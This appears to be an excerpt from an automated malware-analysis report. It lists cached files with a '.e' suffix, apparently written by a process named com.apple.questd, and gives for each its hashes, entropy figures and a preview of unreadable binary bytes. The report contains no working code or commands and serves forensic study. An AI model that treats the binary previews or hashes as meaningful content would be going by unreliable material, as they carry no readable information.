                                                                                                    Preview: BI...y.{..!...e.V.R..jNle..D\..t.z..c .4..U......>.5...O$=....}.....2..6..*~s..uN?<...y...j.-.C..!..).....`.4...L..*.'W...#u...,..Pa]...1M.........K.h...+......Y.....O.......8[......8[..B.E..'....w..9.........=l.@P.D..9tN.>....7*..(.a..a...L...!.....AsE/.s..j..;j..EU.r.....y.e#..P.`..#.._.W.vf.'...a-#.....o.....0..(..ms7.....M.........;8..x.j.l.....j.s..Iy..h....=.........\u~:A..w..$8....&.e......,.a..x..F&.......'.....sl..h...U....s{..e..........d..5.....n)R.c....@.-.K...M......:.._..e.X<H.1.[cf.NW.e.........y]i....U.........N...Q?2uV...^...@.....*.?...y....&.3%f..2...=+..N.C1:..c..'.....D"..V..-,\.{. ....v?..-.....3iQD6..PIc".....+.h...8....5.,.+.P....#|.%....l*Uw3b.5~.=8.\.&...K....yV.G|...*]v..Z....4........].......l........d&...gCK.'N.....B.0..$~.f....NR.._.VAx.......%.R........KM.uA..CG...A;V..P.:#.uZ[]......)......?...L.,,.>.".B....!.o..yA..B..<;........5y._..!...T...!.}. v..*.b...#.s#D...p@a....}..TBJ-f..@!..9.v....V]........(B.....1W..n.E.k..!A?..k.N..o.%...f3.SZT'..YA..P....q
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.9F2A2A2B-E858-44A9-AB37-E9F9CAAAB210.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6506
                                                                                                    Entropy (8bit):7.931978204086386
                                                                                                    Encrypted:false
                                                                                                    MD5:7D6B7B3522B05BEC3679AD45F53CB663
                                                                                                    SHA1:2AD8C1E2F8D8D13908D44AED698C1AC75EBEC829
                                                                                                    SHA-256:29D6BC9BDF3DB82F327E3CF66F3E38651ACEF29C6599FDAA0DD62956D6E9ADAB
                                                                                                    SHA-512:B878C928CD3EB3CE726A095A86929C83E21A8EC3DDDA7EA8BE93E246B7903D1919DAD313C7B45ED29B56335F1B47488CDD3057C90E4A64A879623FE264535732
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 7.....u{}.u...g..]~.N._.=...;%..i...Y.+.(..[..>1...D...[h.....t..BR...(K...=.........Wn....[..'........v...yf....U......h.Y/BWu.......q...L.H.h...%.........?...%[...9M..-)h.)....i..s,..S.?A...!.......S.......e~%.........x!`.(H........{.AQ..%{....4.2/...D.=.....X......ao......1......Y....`i....`....W.....M.P...f.....Fq..g.VO..D|...=.....*.qc...h.w..@..3....j....q.;...|...5".U.....yNH.F.....v....l......._....D......F... .<...E>g.F........"A6..E#....1....>.yDD.b..H...7....~..._.l..;.}u.he.e........|N....r..%..5...8).+...v.....q.HI..A...u............M......./8e.z...C...}.r..a.Ka.../...2....q.w...D.Ri"^...=.c..]..X........e.5.....@............Y.M*..d...^k.?......d.....n..|.......;.....'.-).....:.........:n9.....#Eui.9.g.oH&.H.......#.~.......X.a..H!.5Z.a6W.$.K=.d.X..P.(T..=.O..v&B9........[{I...K....h..B....4"........U~p..'...X.I....la.2tE.9[4.N..T.^r...A.9..#S......7.Q.....A...n......o.b..%....Y..5[.....qn.8..M.m$...z.o......h....v...f_.e?...i.......t..VV...[?.9......Qb..g..#.X.lJ&.^...o.i
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.A428BFE7-0FA8-4532-9A02-8B659C5BEC05.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:Dyalog APL version 22 .152
                                                                                                    Size (bytes):27931
                                                                                                    Entropy (8bit):7.988442052289471
                                                                                                    Encrypted:false
                                                                                                    MD5:F08A38AB6657EF6558236A645D0CE836
                                                                                                    SHA1:993DF4D0C2FD1335AA3334EA478B3763D56FAFDD
                                                                                                    SHA-256:90BA9243D755BFBD68EE69BB77638D21CEF686CB7A886039EB855BCD5056809B
                                                                                                    SHA-512:E1AE444203BDD68907D6EC4CE2783A9D590695CC7B1C1C2603F1295E9566F3747EA20E90DBED620830B6E3DB093538D04C3182A2E12068803CBF9238E89E1E3C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......5P.........}.*h.t.:.3.g.."-.....U....'~..%.L..HqU.zk......`-.PQ.....|....6d.-..........yXmHv..5......X5.9?.....$...%b.W.6X.Y.".;.....X+...ZH..F.....&.O....0/2K..`...l....J).N.....R..@i..../..?..7...;. .\.<.E+..R.GN..]2...,)5..9ca..s..pJ.EcV....U.M[..Y...k.......pG...9..>.Vr........~D..>."...d...HCO.Z.D.0X|...p!w.[..P.......g@..ut..<.".....ZPh....f...<^..V5..y-..eRW.......kt._..........1..Bn..2..+...o..t.6...0.d...]j..O..`El.x....A....u.y..&.F.......'.g....._.j<.3?...gqdJ.Z.z...).........M$....]0..GM.....;..L...0.y.......x..{..d4...s...{1.I[..NV9...Sy......%..g.#....y..cJxU...8....."...+..s.p}!,.........q...Z..z.....P........K"...5EN!.<..........J.,...DB.CA...f[aUV....Y.....`fV.VL...ei\...J.:w....g.Ub}.a`.l.....b...":.....!A......B.p.4G#...$f..Q..`.ms..Z..D4@.....S.m[....5_$...n........|...R..<Us...Z...+u/...&....y.W.D..A.,..;5.....T..GZ2..4....-,...F......K..[*...C>.f...>.....RY...C...}...'....~.|.. Siz...q.......C....|D.._/4.z.!......].........+.vL...J<.......}.@....p..(./. p.d
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.A6B6FE7F-ADCB-406B-934F-DD4384F24AF8.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):16026
                                                                                                    Entropy (8bit):7.957516549762559
                                                                                                    Encrypted:false
                                                                                                    MD5:9DF89A5C633A22A849BE751E06A04659
                                                                                                    SHA1:75B9D342F2CFE239DCA0B49106F5686F9FC9ACEA
                                                                                                    SHA-256:4497653916A54DDF805A9D443DFAB0B9D16EDA77DCC247EF366127D105CB9511
                                                                                                    SHA-512:1967972F3691F58DD63636251B7E89DEC98AFC42AB8017B25B645CD395C4B9A5CF666104F07718D7D0885E093096E904610072051A898D0EB7FBE9BAFC374CD4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..s.;.L.....1...n_C....z.h...Z.h.7.bN......6.....3(Q...=R.<..U.g..."....]F...Y....m.I.0.....8.f.JE.!P..n...gx...2...-......S...I.C.|o..1j..........'.9.Jm..J..m...r.4U2...sS....)tM....U......b..]......%G...G.[.=.o.E..=.....y..`.&.U5K..fF.j...rT.3b....2......f...<.p....Ixb.4fP...x....6.......g...bS....n...S.xE..W.s..o.vNV2....2..y....{..Np...9..p...P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb..s.d.#<..v.../0..pX..g...[..].......;...}..Xn'...Z.@..n....8.^)...L.........j.5...........@.......*.!.I...:.g(.u~.EXL6J2l.nC.f.Id[Yu0..q...E..;J.\.%Y}#i..:.r/q....].. %.L...t....D..5.(.w7j.f...^........N...........<..1*.9$<...;....b.f.&.M.Q..!X..;Z9O.a...{.....Y.......(.m.*=......!0...h.&i!R..'$...6...'k.}97')h6..H.`b.......7.....#.P..l..90..../U.th,.V..1.L..z.e.S...^\...iA.:owQ.H.._........\...>.Q.?<..l>......uRA9..si....5(G....a>~...1.rA......:........OV...^>.-.-T.......}Nb1..52...X?p.:......."X5+.L..+......zg.R....A..!D...,O."..0......m]..2.x.q...^Zc._L...Jx...0....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.A7A2F409-F6C3-44ED-9859-72CDEEB15A96.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7362
                                                                                                    Entropy (8bit):7.918862340695891
                                                                                                    Encrypted:false
                                                                                                    MD5:7BFD8721678CF71615A5D7469BF2D1A7
                                                                                                    SHA1:33357C0E48A41B9018FB5E8F34B42AF617A21226
                                                                                                    SHA-256:3B7787592218E751F68DEA585653D2713EEFAA16EF951EBD4592B9D08FE4F6E9
                                                                                                    SHA-512:B11E51B17EE7FFAA8CD1C627E520EFD0F62037302BD47C31F1148A2C57B0661CDD440233F35A71FEAD9F53D6C5CF3EFB0A666DA5E61936E8CA89382C17738C98
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0...0.:.....4...Q.{.9...V.W:...._.........X.6.....3(Q...=R.......O.k...I...c...H..R{.k.bC.E...%.8.fJ.|*../.....Z.p..|o..1j..............W>...#3...x..x _K'N..h)..""..~?.a.?'............u4......RB._..?..c.b!t..........Ldr........T...c.H.......x.y...j'....#0..m.D....0@.....H.(\....u1[P..........z.T..... ..b\.'.^...d..v....`!^>.-.-T...B.=.....n.\Y.CJ.&.t^....W.g.J7....uph..Q....*}D7.v...1..=...0...l..jlm|,.$.@~...)..A;.f....._s.\..U2.P=..'..V(.x29.....#.>E.oY.T..'.C.Cd.d. ....:..(.?,..M..z......."....3<.V6a.....`p.'z.?.<.6. L.(..../..-.<D.$PtA^I...g...xY.\xR.J-I....ef.}Y........]............+,.i..b.ZU....f,.C.G..?p...x _K'N=y.(......e.6..?......_&..D.p.I.2..V.E.L....O.H...Z...A.h.c....<Mk.W-..}@...W.p4..`7..... E..o.....+......?.......`.e. ....f.,.....K".R......Ua)..8.,...6w*...Q...i......b....!5..........{..Fy=..=+Q......*....y!....'1....V..vl.!.|.}W...R#.Y.8..1'..S.M.>x?d.b..6..(G.....W>.......8...v...5D..U..".7.+......._L...Jx........sCe..4mv...O._b?<........E..(...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.A96DA7DB-45DD-4CE6-9268-8683F6E040C0.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):26483
                                                                                                    Entropy (8bit):7.966785516084715
                                                                                                    Encrypted:false
                                                                                                    MD5:BED8E0C3508FB6F2205DC50D14969091
                                                                                                    SHA1:6481FEE1C2D7D29D844C0B0F25812404E2E3AF14
                                                                                                    SHA-256:E8831D6758A54506D1477094D0EF5CED4671CC392C8BE3509E97966B80E649AF
                                                                                                    SHA-512:5EB4954327579A9B01A386F4C8F0F9759714DD1B3EDCA76D2ED589A55A9979B2AA9F24425BFE8ED3393E40615574B1B85B597B3B3375B244EEB32A00DCE26EDB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0...:%.a,`..I...`d,.....3.T.u"Xi.4TlM.@..V..6.....3(Q...=R.HB.]E..G...?..'.4%M|.|.9...O9..:f.&..<.....^.f&..W..8...X..t........9u..@e...l.K..1*.9$<..<:...........r.....x...........~L:P.........|....pra"...d.,.(..sx.r...{.....7..3....sm.....t.a/[.>....'/..&.hk.GpL0.D..a..wb_,.0O..2..9.7J.i(j....I.n..A;8x....@..`...4.............)..q.:....O..X..`~._...\..1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V. sQ.6[.cH9..U.J5...f.m.<......A...Z..Qx;>B.....L....7t..5Y...Dx..O...=..|u<..3....R..ei..[..9]....-9,C.@...$G...RS..<......;..)k..}....l9.})0...$#...7$.......tTl...m8G;...R.d+...&.......%.p=./C.k.......x.........j.|8.....`..Sx.....QI......K..O..$..c.....2-..!0...h1...Q1.a..R....L....4....n.6.~..P.3..7*. N......\-..Q>^...*.........A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M...q...b.......z.Ic..1...k.3.!*<K....;.i.....X..j............`.jy....04.j.%V...P,h.!.......e.T.....7@3f.x|eh......R.+Y.S..............-...wF.r....PNGg..h,..G..%.nC.{.T......#$.S
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.AA207F95-4761-4CD9-A3EA-1605D77D5410.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10394
                                                                                                    Entropy (8bit):7.938058501202542
                                                                                                    Encrypted:false
                                                                                                    MD5:59404B9B9A10812FD8327B0BFD5037E8
                                                                                                    SHA1:6E0B4E40F01126E96B37D433DE544BC48F0AAB92
                                                                                                    SHA-256:CA47AB9DDFC3BE1679BE67EA88253F0B43F0F70FEA3FED2187E0BCE93E89075D
                                                                                                    SHA-512:9690776D260098B8B4CBDE9DEE83EAB9C60427DFD45164CBE5C29608FA19A9E2690993B0B8CFB1512B44DA4046734A44C8E1FE253C3038CD5BB75270DE3C77BF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0.....V.4.pn..v.P..o.;.......l.....2..D..R..6.....3(Q...=R.HB.]E..G'W{..j..p.$._......Y....m.I.0.....8.f.JE.!P..n........!...vl..a.%yB.....1..KkT...3..1._s.L%iW........"X5.T....m..(.....L...Udz{.,.nRvo.........(.z>.,..sA.3.H....U:...........Ur2.5{.X.....}xT.............!...L...<...A.)}'.&._?..........S.......N.%......=%Ro........5....y..s.2...*.)>F....m^....U.X1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V..m.cf5.a....p..0.2.&N.........A...Z..Qx;>B.....L....7t..5Y...Dx..f._....$.....TG.Q...\...N[..<J...5..:.!.......sSq....8...y.u]...-M.g1.+... ...2...O....K.&......6.....3.1.....l....Z.p..|o..1j.............C&....4`..o..3K5?..._.........!0...h..|.......l....l.[......g!..WLAd.\Yw.... 7....H.Y.*..4.'c....m..a...z$....L..y.5...u.f\.<o\!b..x..1..H*Vp......WM3......H..G...C.Ux..&..$e.?o.yb.w...\4.......)......m.....{.Y..CJ.[L..6....go.cz.M..,...(.....LQ..`w&.o..............i1QP...kc.)>F....m......?.+..5Y...a.D...[r.o\A.....l=..p.u.E..(...X....E.h]i.....D
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.AFB9D202-C736-4E35-BE99-4A63821D6F9C.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):17675
                                                                                                    Entropy (8bit):7.964045782591135
                                                                                                    Encrypted:false
                                                                                                    MD5:43079ECFAEEBE3EA8F0DE9E941A92D35
                                                                                                    SHA1:F769874EBE2338CFAAA66CC266BFD92AE357BE49
                                                                                                    SHA-256:8CE47B7E294C5288C25AC9795E7FDC4E70773B6D5DC0B23A8BF12B5802E24734
                                                                                                    SHA-512:D159930236EAA03427546B2CAEF5238963782B7AB5031E600EEFDBA9CC59E22A52068B25D5BCCFEF9911A368008A9F3CAA76AF3A554A1E45A0EFC8E7C8FEFF88
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0.....#,.U....'.%......u.D(.....1Y.h......=.6.....3(Q...=R.......O.-.<mh......J....[..^b...,...r]h.hfL.gn.....`......?(..y.Mu.P._........M.......!.!..x..........h.9j.....X.#2K__...}.u.....).zm....t?....3q...9...I.;&.f.E2.j..._y....G=..<.n.'.*t......P.<D..Ix.......F\P.."ppA...."..8K..I............IU.8.?.*[aqhdS..!.......Y.........NF)s...XOFe..n........2%..F.....e.....%..I.P.....w[..".+~...WbG..6.b..i..G....l.H....,k]v..z..F.;-.nBw..zx3I._.^...n...aNOV.9....17......R...NO.w...O.0.&.....]..........e....x..[..9]...e=. ).9.})0...J.....t..............."........sk...S..f.....c...6.....3.1.....l....Z.p..|o..1j...I.f..&.k... ......F.K..o.U..L....C5.m..w[...1#.....mG)q7....p..`..eh...:....c.......#...v..i....$...A..5..t......+......?.......`.e. ....f.,.....K".R......Ua)..8.,...6w*...Q...i......b....!5....[......9....P..........*....y!....'1....V..vl.!.|.}W...R#.Y.8..1'..S.M.>x?d.b..6..(G.....W>.......8.k....Pkn.....P#Y..QGB.......9....Le...bB.<......'....?.c.+L....x.i..r.6.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.B51C4CD3-E0CE-4A1D-82D9-65AEF0DBC5FA.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):51789
                                                                                                    Entropy (8bit):7.994979041334495
                                                                                                    Encrypted:true
                                                                                                    MD5:ACAC9E40B7BF3CFCA36AD0B8677BB4DD
                                                                                                    SHA1:A4237843A37B66CF6CCBE19D34D57F26A6E9469D
                                                                                                    SHA-256:309724FC62C525ABE2471F3C18EB5EC214CC839F0EA75AD0C21E6AF141AE811A
                                                                                                    SHA-512:F445FF2180C2B0F1DBE7AF25065ECBE7346747CF2F1CFACF448BAB66D4F771195B8331537AA4590AFFEAE1CD5D7948B6EA8074171633584E7EEE9F6692B73021
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .9.....E.o..a_v..Dvx..?..n....r."-.....U>..pk.b.f,.*-Z...~..H.... .._ ..B.A,....1.O..r.........4.tk......>.V........Fv.../...#....(...K.....SiGB(;.<fv&.....Q....<............PD........-....9B(.".C.$.._E6..b.CM..H..`..,.....8...m..v@..8.u..Y....IC..6.W..'...`]........`...K.-..`.......$F....Zt..y....D...>.m,......]~.J ....C...c.C.(3.nc,..+!-....c....n.._.K.}.VO".V.....+,..y/..b.......WV.`MX.A)..1^E(..+.q.]B........M.~.ip.j.9....O.V....]A.).P.A...1..||...$b.r...A...~.&.r..1.&......P.3....G. .h...z..]......D.....44.......MND..IG:7......]&...s.j..e..{-?. .O..._v.u)...T N0..4?..s-d...X...'..Z...-z....q.h!4.!.9...........zyx...u...........LZ.........{...6.j.&g....;...'..Im..{._...l..&...P..a..C.;.ls..(..T..)~t(.b;E..........80.......X.m.........:......b...(.q.:q..%34..]...........rJ...7.ZmF.0s.v..W>J..h.O,.V.....).....f%..!{49W..p.E...T_..*..b....D]k-N....Ms.X.w...YH2F....c...<=.6...M..s.......1K6B.....j.2.....E.!..C.......c...~%8.8.C..Z...."...KZ+...=.;T. .}.Fd...q.!.......}H.......JMn...t..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.B9F6873E-0942-40DC-96CF-03DFC1C5212A.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18443
                                                                                                    Entropy (8bit):7.980506333302962
                                                                                                    Encrypted:false
                                                                                                    MD5:45FB2C5A5B69C2009557584D94B49F9D
                                                                                                    SHA1:874A7E34CD6429DF79F5AB163718F04E76092529
                                                                                                    SHA-256:CEF28FAF929D4E05B6E63C793F9C1933C4E691925268528E7886B7EC55190DCB
                                                                                                    SHA-512:BDE660E9EFA5CCBD14FF9BC997AF3D2BA4DCE96D639211F653C1C9D7CD49D647C1E7452BA08E39B5AD5F42F2BE5E2D89D6852C5B9BFA952B95382D49A13DCC74
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .F.8..q..2.%...t<.)...-D...]W.i...H..i.s...%T....l....gU.om..$9.[..`.. m.=O.<.E.2F...@/MN.El)..e.s.a....~.n(..N.+...Ld..,.|;.SSE>5...3...^.vw.......d....r......oB..D.{.f;6...f(X...I.z...Z....XzL..Us..jDR/.3.V#....a.>.1.*..B.........H..x.h.(...u..'V.=:...eT*....P....g.Q8.M..>.!.#I|?..BB..r.B..Q.<X.......d<...{.x8r...!.^@8.0...$E."P......v..Z..O....A..?..#.sAe*A.....B..-..Z......M8.mG~...).L5|..p ...-p..[P.,.....+....R..G.Dq........UZ........$1..3..mx..r]..3.5..;.....{-..J$l..i].H ....:.Gb.ht.4o.....U`.W'.f.].w......s4kz#...;..tR..C...k.`q..3>..."..0Z-jC..P..Q...o..x+f..(T.!..........z%..R...+1D..]q....<....m......J....)....).nV..A..!..g.."z.x....g1./.S.o....q"....Co.g....)J..bey....X....]...f....e@.(....._..A.~.Q!....Yhd.j..@............w..g\}.NDY..z...uuy".G|........BL.....L.]<..iU..3.....Vz.%.;...........>..Ry...<.....,..E:....~.g....Z._.k.>.............tfG..a."v2T.R..by.....f..^RX........UX5.x.-2.cZV...=.>..........s..g......tf.c.....m..eD..lq...r..y.i..4f.O...'....52........Bt.....#
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.BD34BF61-066F-40B1-99DD-E069585D8C25.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):11522
                                                                                                    Entropy (8bit):7.964099256371837
                                                                                                    Encrypted:false
                                                                                                    MD5:D6D329FB512527683FBB09E1132BCA75
                                                                                                    SHA1:ACD45C2D640F7AF5E9EF6C9C29EAF5B3836EA16C
                                                                                                    SHA-256:8B0DA2691D75327A5479C5BBA278FEF63ECBB36C71A9874F02A236C4EC7D639C
                                                                                                    SHA-512:BA7FBDE7F9B234D38D37A762C543EBF46F6AC571679CE0D478F954DE567D7D63A0017D9F84E66F6E2F71687ADC9717672873D2123A085983709072865C1C3E7B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..<P../.v;. ..."....;....`...."..o..}.I..}...&.7].......>+L.Z.....".JH]..G.;..?...%C^9...'...........!..x.....;C.=7.B0..S.m?......V..gV....B...J.8....../{LbVL..bx:.v.....0.zkv.s....fKK...?y........H.....*m...z 2.Q.K.?..V....?......#.....).v./..hUq.Q"..R.....u@....v.1.,......V.LU.z..7<?`\Y.....c.PH........,........wJ....fj......!....~.....[.....%T.....G&8j"_..l...q..5v..._..|...n..56.........../....`J..)N.6U.........nv3>......!.4..t;..|.....K.U.".".Tkq.G..I....5..........d.#e{..U...jQmC5kdr...W....3.......+....\..8lR.~..5).!4..........K.).......k.e-.A.(B.;........Z.....^......f.[@.)n..x..*....G.....T....F.}.....$H..X.......=.'.9..?][{.....Z....|..M@3<ic5.@.Q.-..[....h...^5){......(.5.J"aS].....f..$...8..p=.t.......c7.a..m ..\*..M.g....--..T?MRl7n../_.ST.(.m,.u3.......z..7h....!2Z.w....5~....F.m..A....*N......@..B.%$.Y.......S..x..hp.2:=K.C...C.M..~g.UN.....l.D~E......Uz(..&.......h.{.S.........c6..p...d.]."e.:.u..;.GFJ....E}...Cr.k...w...F..5>...R.D..8.m.....f.U..5.9..4...+.$YQ.#%.....[
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.BD5C588D-B7C3-48CA-8F71-54DEC201E905.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):27507
                                                                                                    Entropy (8bit):7.9905378265775795
                                                                                                    Encrypted:true
                                                                                                    MD5:93CEFB943C2EF96316D7B3CA66457651
                                                                                                    SHA1:31324DCE513182BD2FD3C6CEC739AFEFE9B1F79D
                                                                                                    SHA-256:709837C65ED24C5CD6BEBEAD750CD1FCA4BC70C372F448FED7A25CD852B505AF
                                                                                                    SHA-512:A1E5F915A0FF0B977519AA20AE570D09D93F97C424CA47CE72EA140403D8E6F00F9CB4AB5CA024DF7ACED18446ABEE0A04B9E88CF1187B61DEEBCB3F54A52E06
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: t.~?.y<.h24..#..r.i...7.:.3..T.T.S.yL.1b......4.........x......n...:............w..+=..-.1...<>.....c-.y..[....6.=..]I:P@.e..k.I?...{.c..$PB..\....w.....v..{..C40].z..2sg[.5fM.........H.LQ...o........#...............^.W...6.utM.zp.S_.&.)9...".q.*~O..nk|&......nY#..H..........yD0..W.`8(..t..0I......./..G..I..Y.O..&...Y.@C.6.~.@..c$M,.|.#.H,........."R\......X!#.$.)&.,..@.'.......3}R].K...66.....T...zk8}`@z..).R......_P.....T.1z...gP....U..._..S^J).>....)...#.m...a.xV[2..TF......6VX...d...^..x8..p].....s^.hv.&.....\X.?H5.......f.+k.E..x....W@.5.4$...........[...........c...+..y*.k9...jla.......D.&.....S.... ....%...]Z..6!.....p./:..v.$...Q..d8....L{.5....6..0W=X....1L:;..P:}..h..q.0.....*....KJ!*L..W.j.H...3zx\.JJ:...p.H*.5+@.......X.$,...>q,no..,.....).P.?..sN.p.........kU...!.&..+.<T....3P...?.{a}TE.pkV._......'WD...U....;.h.....c.+..OM.'....C`7r.qF. ...g.Lx.".5..0.<i..Ck.C..yV..9c@M...{...R.+Ke_.Y.;..._5o...._..!FY..!...e..>_L....*.t...F.Y.p...(..J...F..0.I.R..W...+..r..}P..#7u.<..d..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.BEBFF984-55C0-4F7D-A55D-8F167D16DA70.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10082
                                                                                                    Entropy (8bit):7.940270454976054
                                                                                                    Encrypted:false
                                                                                                    MD5:C03966087683CC6C6FB13C3B9943D56A
                                                                                                    SHA1:F6ABA6DA66F74F7195DFAF20AE13D76607A24337
                                                                                                    SHA-256:E5B76FC2A52A2B3798EF4DC6EB35BB9690EAC6BB23823F53F377DCB415058743
                                                                                                    SHA-512:313E75EA3D3A1868C25A68CC123BE3CC4D2213A496EC015F9375A77BD998B6199E8BE4278BD4F4B5C26703C568EE9C29B8FF2AE8DA77ED562A0FD91197E90CE9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..'.....)!.9..pBu..Y......~...'......(|D.8.6.....3(Q...=R.xh`..&..c.......pe...I...u....-..q.:....1..KkT..F.....`......W>...#3...x..x _K'N..h)..""..~?.a.?'............u4......RB..#f..yD.YC<.^..@..............Q.L..._....".<.'....;.nx........?...B.$..$f}..|.;..s..A?....O.......z.T......k.I.}.7.........h..=.^>.-.-T.5D>,....hN.t.is.6...%=.....P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb+`..e....c.....U....M...1..m.........;...}..Xn'...Z.@..n....8.^)...L..... ....~.........\].....?...*.!.I...:.g(.......-..juI./2.F....7.sq...E..;B...j1....%...|.^.iZ....:+[.-l%1:X....2..!P..n...gx...2.D.....4......FV..c'lH........C..].2...\.......K4Y.E...|U...[.n.~?L:..;.x......c.nL....p..[:R..o.....E..4V?3.K!y...^\...iA.:owQ.H.._........\...>.Q.?<..l>......uRA9..si.AW.}*jo...a>~.....o....u....@Rqx=.J.\..<^>.-.-T.......}Nb1..52..t..Y8..H....."X5+.L..+......zg.R....A..!D...,O."..0.......:./..O.a'.0;w..uQ...c..h}.h.MV5..`.....s....\.....n.s...p..:sk.9l.....M...!.$....a........E..4
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.C1DFE0E1-3B68-440A-8220-A7B5F8E240AC.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):81470
                                                                                                    Entropy (8bit):7.971431920037252
                                                                                                    Encrypted:false
                                                                                                    MD5:E62C34DA910BE14124473C1468460CD2
                                                                                                    SHA1:0E92898504606EEB4D7177452F5E6C8A5276E0D3
                                                                                                    SHA-256:CB642F409F8895B75ADB8DDA64CBCBEA782900493D154A5A59673BD0DAD3DA36
                                                                                                    SHA-512:972B68912D0589CC6526972404554D54D5169B91B2364E15A583076626E157A3B07AF664DE5075D4E73BE27B24136287F135F4A71B0FA565A829111453B32A47
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....)...N...zF.......=.........W.(../".[ic.6.....3(Q...=R.ixD.v.....,.@.\_.. ..._...ii..NH..W..z>...&......ZI..ET.......q$.t......r......+.N8...J..s-.q|...A.I........T...;....e(.....Fg....4..&"....q...).:Om4..2..!.y...P.|.i..KO.,`K...\ ......u.Z..Q.$.Zw..'.p..2..........R3...~.n...D..][.p3%p..KV.....1.y..4...)m..q...D7...8..x'E!...@.....6nJ..T9...P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb..s.d.#<..v.../0.....H...\%.&].......;...}..Xn'...Z.@..n....8.^)...L.........j.5...........@.......*.!.I...:.g(.Z........q...H........"........s.y.}..;.......y.../..$-..m...l...1.....l....Z.p..|o..1j.........:.-.P<..<.....b..T.v].....&A......d;8....W(`..>... U.An..........3......@Vu........r....=.@.....SFx!..rhdb.....$...P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb..s.d.#<..v.../0.....H...@.X.a~......{.1.!.&w......W.;.7C.}.^....H.q........}.N.{k".O..Y.[T5....qyv..`.C89...w......`.B..O..L.n....{.....Y.#.N!..H/.mdN.i...B.nE......e.M...!.$.).............x...F./..(
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.C4157816-627E-4225-A9FD-2C5E46CF7169.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):23547
                                                                                                    Entropy (8bit):7.969689360766616
                                                                                                    Encrypted:false
                                                                                                    MD5:D2FC8C892BDFEA6C486098BA1858F82B
                                                                                                    SHA1:91470B6EB9C4F30291806C01DE3144CFB15E9128
                                                                                                    SHA-256:FD9BD73DF75C89AF318CBF185A01BAADE653DA04874DA66CC36E0C6C26FB1E19
                                                                                                    SHA-512:3530C3709881D08D34C83B5783EF73FCDA139610D028A2262ADC1433CC2DD1E84B764AF9EA1918BDDB5D0EB2EF4DF7BD8773B122003C88CC32A3CCB7DB2D8E7A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
